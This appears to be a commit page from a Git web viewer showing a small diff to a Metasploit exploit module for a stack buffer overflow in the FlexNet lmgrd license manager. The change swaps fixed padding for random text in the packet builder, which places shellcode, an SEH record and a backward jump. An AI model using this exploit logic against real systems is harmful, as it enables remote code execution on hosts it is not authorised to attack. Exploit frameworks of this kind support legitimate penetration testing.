randomization when possible for flexnet_lmgrd_bof
parent
cafe803217
commit
c823e8099e
|
@ -185,12 +185,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if target.name =~ /Debug/
|
||||
pkt_data << "a" * (65535 - header_length)
|
||||
else
|
||||
pkt_data << "a" * (target['ShellcodeOffset'])
|
||||
pkt_data << "a" * target['ShellcodeOffset']
|
||||
pkt_data << my_payload
|
||||
pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
|
||||
pkt_data << rand_text(target['Offset']-target['ShellcodeOffset']-my_payload.length)
|
||||
pkt_data << generate_seh_record(target.ret)
|
||||
pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
|
||||
pkt_data << "c" * (65535 - pkt_data.length - header_length)
|
||||
pkt_data << rand_text(65535 - pkt_data.length - header_length)
|
||||
end
|
||||
|
||||
pkt = create_packet(pkt_data)
|
||||
|
@ -201,4 +201,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue